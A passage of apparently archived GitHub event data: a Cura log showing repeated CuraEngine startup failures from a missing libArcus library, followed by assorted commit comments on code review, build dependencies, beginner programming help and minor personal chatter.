(logException [53]): Exception: When trying to deserialize, we received an unknown ID (Monoprice Select Mini_current_settings) for container\r\n2016-09-11 09:49:21,612 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:21,621 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:21,622 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:21,623 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:21,623 - DEBUG - .../UM/Controller.py (setActiveView [80]): Setting active view to SolidView\r\n2016-09-11 09:49:21,642 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:21,642 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:22,619 - DEBUG - .../UM/Qt/Bindings/Theme.py (load [118]): Loading theme file: /usr/share/cura/resources/themes/cura/theme.json\r\n2016-09-11 09:49:22,738 - DEBUG - .../UM/Qt/Bindings/Theme.py (load [118]): Loaded theme /usr/share/cura/resources/themes/cura\r\nQObject::connect: Parentheses expected, signal MainWindow::\r\nQObject::connect: Parentheses expected, signal MainWindow::\r\n2016-09-11 09:49:22,893 - WARNING - .../cura/Settings/ContainerManager.py (getContainerMetaDataEntry [170]): Could not get metadata of container  because it was not found.\r\nqml: \r\nqml: TableViewSelection: index out of range\r\nqml: TableViewSelection: index out of range\r\n2016-09-11 09:49:23,274 - WARNING - .../UM/Preferences.py (getValue [70]): Tried to get the value of non-existing setting info/automatic_update_check.\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\nfile:///usr/lib/x86_64-linux-gnu/qt5/qml/QtQuick/Controls/Menu.qml:149: TypeError: Cannot read property '__contentItem' of null\r\n2016-09-11 09:49:23,315 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,326 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,326 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,327 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,332 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,333 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,335 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,347 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,348 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,349 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,349 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,350 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,352 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,372 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,373 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,374 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,374 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,375 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,377 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,389 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,389 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,390 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,391 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,392 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,396 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,410 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,410 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,411 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,411 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,412 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,415 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,427 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,428 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,429 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,430 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,430 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,433 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,446 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,446 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,447 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,448 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,448 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,459 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,473 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,473 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,474 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,487 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,487 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,494 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,510 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,510 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,511 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,512 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,512 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,675 - DEBUG - .../UM/Qt/GL/QtOpenGL.py (__init__ [19]): Initialized OpenGL subsystems.\r\n2016-09-11 09:49:23,675 - DEBUG - .../UM/Qt/GL/QtOpenGL.py (__init__ [19]): OpenGL Version:  4.5.0 NVIDIA 361.42\r\n2016-09-11 09:49:23,676 - DEBUG - .../UM/Qt/GL/QtOpenGL.py (__init__ [19]): OpenGL Vendor:   NVIDIA Corporation\r\n2016-09-11 09:49:23,676 - DEBUG - .../UM/Qt/GL/QtOpenGL.py (__init__ [19]): OpenGL Renderer: GeForce GTX 750 Ti/PCIe/SSE2\r\n2016-09-11 09:49:23,774 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,793 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,793 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,794 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:23,796 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,797 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,798 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:23,818 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:23,819 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:23,820 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:23,820 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:23,821 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n..."}},"created_at":"2016-09-11T16:51:30Z"}
{"id":"4546133879","type":"CommitCommentEvent","actor":{"login":"kalsam"},"repo":{"name":"kalsam/kalsam1234"},"payload":{"comment":{"id":18977483,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T16:51:47Z","updated_at":"2016-09-11T16:51:47Z","body":"242341212"}},"created_at":"2016-09-11T16:51:47Z"}
{"id":"4546134629","type":"CommitCommentEvent","actor":{"login":"delphiactual"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977485,"position":null,"line":null,"path":null,"commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:52:14Z","updated_at":"2016-09-11T16:52:14Z","body":"Understandable"}},"created_at":"2016-09-11T16:52:14Z"}
{"id":"4546135697","type":"CommitCommentEvent","actor":{"login":"kalsam"},"repo":{"name":"kalsam/kalsam1234"},"payload":{"comment":{"id":18977486,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T16:52:58Z","updated_at":"2016-09-11T16:52:58Z","body":"242341212"}},"created_at":"2016-09-11T16:52:58Z"}
{"id":"4546135944","type":"CommitCommentEvent","actor":{"login":"kalsam"},"repo":{"name":"kalsam/kalsam1234"},"payload":{"comment":{"id":18977488,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T16:53:09Z","updated_at":"2016-09-11T16:53:09Z","body":"242341212"}},"created_at":"2016-09-11T16:53:09Z"}
{"id":"4546136211","type":"CommitCommentEvent","actor":{"login":"kalsam"},"repo":{"name":"kalsam/kalsam1234"},"payload":{"comment":{"id":18977489,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T16:53:20Z","updated_at":"2016-09-11T16:53:20Z","body":"242341212"}},"created_at":"2016-09-11T16:53:20Z"}
{"id":"4546136697","type":"CommitCommentEvent","actor":{"login":"swansea679"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":18977490,"position":null,"line":null,"path":null,"commit_id":"f7118224290aea335eca3e9ae87fa539b5a52869","created_at":"2016-09-11T16:53:41Z","updated_at":"2016-09-11T16:53:41Z","body":"f711822"}},"created_at":"2016-09-11T16:53:41Z"}
{"id":"4546137662","type":"CommitCommentEvent","actor":{"login":"piedoom"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18977493,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T16:54:18Z","updated_at":"2016-09-11T16:54:18Z","body":"This section is for the commit diff - AKA the stuff in green.\r\n\r\n```\r\n+    Tumblr may add its own affiliate code to links posted on Tumblr at its \r\n+    discretion, provided a user has not previously included their own affiliate\r\n+    code into the applicable link. Users may opt out of this functionality \r\n+    here: https://www.tumblr.com/settings/blog.\r\n```\r\n\r\nAlthough it seems Tumblr is fine with discussion, the issues you're bringing up aren't at all relevant to the topic of this thread.  In other words, I don't believe this is the correct outlet for your feedback.  "}},"created_at":"2016-09-11T16:54:18Z"}
{"id":"4546138633","type":"CommitCommentEvent","actor":{"login":"kalsam"},"repo":{"name":"kalsam/kalsam1234"},"payload":{"comment":{"id":18977496,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-11T16:55:00Z","updated_at":"2016-09-11T16:55:00Z","body":"242341212"}},"created_at":"2016-09-11T16:55:00Z"}
{"id":"4546139414","type":"CommitCommentEvent","actor":{"login":"elitak"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977498,"position":null,"line":null,"path":null,"commit_id":"d688bf611ad82b754c4b57e40d412516b4be64da","created_at":"2016-09-11T16:55:32Z","updated_at":"2016-09-11T16:55:32Z","body":"Linking against jimtcl results in unresolved symbols. It's quite possible\nI've misunderstood something. Try building openocd without this propagation\nand see what I mean.\n\nOn Sep 10, 2016 2:59 PM, \"Bjørn Forsman\" <notifications@github.com> wrote:\n\n> Why should these deps be propagated?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/NixOS/nixpkgs/commit/d688bf611ad82b754c4b57e40d412516b4be64da#commitcomment-18975150>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAu8MTsZcKdRMB-yJoTXuZK4XtuAROI-ks5qoyhLgaJpZM4J51yT>\n> .\n>\n"}},"created_at":"2016-09-11T16:55:32Z"}
{"id":"4546139823","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977500,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T16:55:51Z","updated_at":"2016-09-11T16:55:51Z","body":"Ok, please let me know when you are done with the change so I can path Primus.\r\nThanks!"}},"created_at":"2016-09-11T16:55:51Z"}
{"id":"4546143527","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977507,"position":null,"line":null,"path":null,"commit_id":"1038a7ea2391912060a3849b66ca73d9ac88e88f","created_at":"2016-09-11T16:58:30Z","updated_at":"2016-09-11T16:58:30Z","body":"@rickyc i can now sign up a user/password and log in successfully even after another sign up! However, i can only save one set ? (ex: user[1] doesnt work even after i sign up again)"}},"created_at":"2016-09-11T16:58:30Z"}
{"id":"4546145177","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977510,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T16:59:44Z","updated_at":"2016-09-11T16:59:44Z","body":"Geez, my email keeps getting spammed.  Zachary, why does it matter?"}},"created_at":"2016-09-11T16:59:44Z"}
{"id":"4546145377","type":"CommitCommentEvent","actor":{"login":"saskiapuspita"},"repo":{"name":"saskiapuspita/FormBimbel"},"payload":{"comment":{"id":18977512,"position":11,"line":11,"path":"README.md","commit_id":"8e63737e996ae6257657b4aac1e7596b5afc29a8","created_at":"2016-09-11T16:59:50Z","updated_at":"2016-09-11T16:59:50Z","body":"Link Download apk\r\nFile apk :\r\nhttps://drive.google.com/file/d/0BwiHwO5sysFyeHFmX1VwNjE1a2s/view?usp=sharing"}},"created_at":"2016-09-11T16:59:50Z"}
{"id":"4546145570","type":"CommitCommentEvent","actor":{"login":"dsjeong77"},"repo":{"name":"ChangHoon73/bookdream"},"payload":{"comment":{"id":18977513,"position":null,"line":null,"path":null,"commit_id":"0923288675287377d005d9781eb77ac22a34fa17","created_at":"2016-09-11T16:59:58Z","updated_at":"2016-09-11T16:59:58Z","body":"미완성입니다.어려워요!!"}},"created_at":"2016-09-11T16:59:58Z"}
{"id":"4546146485","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18977515,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T17:00:27Z","updated_at":"2016-09-11T17:00:27Z","body":"Yes, that's correct. I just noticed that I missed to build some packages for Yakkety. Additionally, this kind of problem can happen if you are building another package too early, so the old dependency will be used instead.\r\nI'll rerun my builds here now."}},"created_at":"2016-09-11T17:00:27Z"}
{"id":"4546151830","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977522,"position":null,"line":null,"path":null,"commit_id":"1038a7ea2391912060a3849b66ca73d9ac88e88f","created_at":"2016-09-11T17:03:43Z","updated_at":"2016-09-11T17:03:43Z","body":"Let's think of this scenario\n\nvar numbers = [1,23,4,5,6,2,3,5,6,10];\n\nHow many numbers are greater than 5? How did you figure that out? Now how\ndo you do it with code. Think back to Friday :)\n\nOn Sun, Sep 11, 2016 at 12:58 PM erinl1 <notifications@github.com> wrote:\n\n> @rickyc <https://github.com/rickyc> i can now sign up a user/password and\n> log in successfully even after another sign up! However, i can only save\n> one set ? (ex: user[1] doesnt work even after i sign up again)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/1038a7ea2391912060a3849b66ca73d9ac88e88f#commitcomment-18977507>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAG0kbxAe8qbb9VxioSr6oPiLJZsTPtTks5qpDM2gaJpZM4J6DMS>\n> .\n>\n"}},"created_at":"2016-09-11T17:03:43Z"}
{"id":"4546152284","type":"CommitCommentEvent","actor":{"login":"GrinningFerret"},"repo":{"name":"TeamOrion/platform_manifest"},"payload":{"comment":{"id":18977524,"position":13,"line":14,"path":"default.xml","commit_id":"7e7ca090d5a62fc50f2e6f8f0b176692ceafb235","created_at":"2016-09-11T17:04:00Z","updated_at":"2016-09-11T17:04:00Z","body":"Whitespace :P"}},"created_at":"2016-09-11T17:04:00Z"}
{"id":"4546155508","type":"CommitCommentEvent","actor":{"login":"azizurice"},"repo":{"name":"iMaruf/JavaBasicLearnning"},"payload":{"comment":{"id":18977528,"position":null,"line":null,"path":null,"commit_id":"f3aa508f27e51cceab62cff735c684f145005dc1","created_at":"2016-09-11T17:06:04Z","updated_at":"2016-09-11T17:06:04Z","body":"Thanks for update. However, it is not what I mean by meaningful variable or method name.  It is still ambiguous. For what did you want the method 'process' would do. Based the work it will do, you would give one of  the following names in Java:\r\n1. compare\r\n2. compareTwoNumbers\r\n3. isFirstValueLargerThanOther\r\nParameter variables 'answer' and 'result' are same . You can use any of it\r\n\r\nSee the following link:\r\nhttp://www.itiseezee.com/?p=83. "}},"created_at":"2016-09-11T17:06:04Z"}
{"id":"4546157619","type":"CommitCommentEvent","actor":{"login":"yomboprime"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18977529,"position":247,"line":247,"path":"examples/js/nodes/NodeBuilder.js","commit_id":"c451cfa113fb1eb24eb2a41cd62adaa9faa3f078","created_at":"2016-09-11T17:07:28Z","updated_at":"2016-09-11T17:07:28Z","body":"This should be the triple comparator `===` instead of `==` ?"}},"created_at":"2016-09-11T17:07:28Z"}
{"id":"4546157764","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977530,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:07:33Z","updated_at":"2016-09-11T17:07:33Z","body":"I want to know, if you don't want me to know, DON'T RESPOND, USE A\nDIFFERENT EMAIL, OR SOMETHING!\nWhat do you mean by flirted?\n\nOn Sun, Sep 11, 2016 at 12:59 PM, Garrett Smith <notifications@github.com>\nwrote:\n\n> Geez, my email keeps getting spammed. Zachary, why does it matter?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/Projects/commit/b0848810b71bda3b651589fec3003d63a31d0bcd#commitcomment-18977510>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOneh_9D6omjXemBmD6I-Wsl133vlbks5qpDOAgaJpZM4J5ZuF>\n> .\n>\n"}},"created_at":"2016-09-11T17:07:33Z"}
{"id":"4546158477","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977532,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:07:58Z","updated_at":"2016-09-11T17:07:58Z","body":"Hey, at least I spam on one conversation!\n\nOn Sun, Sep 11, 2016 at 1:07 PM, Zachary T <zacharacutey@gmail.com> wrote:\n\n> I want to know, if you don't want me to know, DON'T RESPOND, USE A\n> DIFFERENT EMAIL, OR SOMETHING!\n> What do you mean by flirted?\n>\n> On Sun, Sep 11, 2016 at 12:59 PM, Garrett Smith <notifications@github.com>\n> wrote:\n>\n>> Geez, my email keeps getting spammed. Zachary, why does it matter?\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/JoinRajuncraftNow/Projects/commit/b0848810b71bda3b651589fec3003d63a31d0bcd#commitcomment-18977510>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AQMOneh_9D6omjXemBmD6I-Wsl133vlbks5qpDOAgaJpZM4J5ZuF>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-11T17:07:58Z"}
